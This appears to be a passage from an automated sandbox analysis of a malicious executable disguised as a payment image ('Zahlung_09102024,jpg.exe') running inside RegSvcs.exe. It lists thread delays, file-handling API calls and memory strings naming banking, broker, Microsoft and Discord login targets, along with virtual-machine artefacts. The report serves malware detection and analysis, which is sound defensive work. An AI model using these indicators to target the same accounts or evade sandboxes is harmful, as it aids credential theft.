Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 922337203685477 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 600000 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599889 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599781 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599672 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599302 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599175 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599047 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598938 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598813 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598688 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598563 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598438 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598328 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598219 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598094 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597985 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597860 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597735 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597610 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597485 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597360 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597235 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597110 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596985 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596860 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596735 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596610 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596485 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596360 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596235 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596110 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595985 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595860 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595735 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595610 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595485 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595360 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595235 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595110 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594985 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594860 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594735 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594610 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594485 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594370 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594250 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594141 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594030 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 593907 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 593797 |
Jump to behavior |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, |
0_2_00452126 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, |
0_2_0045C999 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, |
0_2_00436ADE |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, |
0_2_00434BEE |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_0045DD7C FindFirstFileW,FindClose, |
0_2_0045DD7C |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, |
0_2_0044BD29 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, |
0_2_00436D2D |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, |
0_2_00442E1F |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, |
0_2_00475FE5 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, |
0_2_0044BF8D |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 922337203685477 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 600000 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599889 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599781 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599672 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599302 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599175 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599047 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598938 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598813 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598688 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598563 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598438 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598328 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598219 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598094 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597985 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597860 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597735 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597610 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597485 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597360 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597235 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597110 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596985 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596860 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596735 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596610 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596485 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596360 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596235 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596110 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595985 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595860 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595735 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595610 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595485 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595360 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595235 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595110 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594985 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594860 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594735 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594610 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594485 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594370 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594250 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594141 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594030 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 593907 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 593797 |
Jump to behavior |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - HKVMware20,11696428655] |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: ms.portal.azure.comVMware20,11696428655 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.co.inVMware20,11696428655d |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: global block list test formVMware20,11696428655 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: account.microsoft.com/profileVMware20,11696428655u |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: global block list test formVMware20,11696428655 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: AMC password management pageVMware20,11696428655 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: tasks.office.comVMware20,11696428655o |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.comVMware20,11696428655 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: turbotax.intuit.comVMware20,11696428655t |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - HKVMware20,11696428655] |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.co.inVMware20,11696428655d |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: bankofamerica.comVMware20,11696428655x |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: netportal.hdfcbank.comVMware20,11696428655 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696428655x |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: discord.comVMware20,11696428655f |
Source: RegSvcs.exe, 00000002.00000002.4495940076.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN |
Source: Zahlung_09102024,jpg.exe, 00000000.00000002.2072224583.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: fb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C22 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: turbotax.intuit.comVMware20,11696428655t |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office365.comVMware20,11696428655t |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696428655} |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: account.microsoft.com/profileVMware20,11696428655u |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696428655} |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: dev.azure.comVMware20,11696428655j |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^ |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.comVMware20,11696428655} |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.comVMware20,11696428655} |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n |
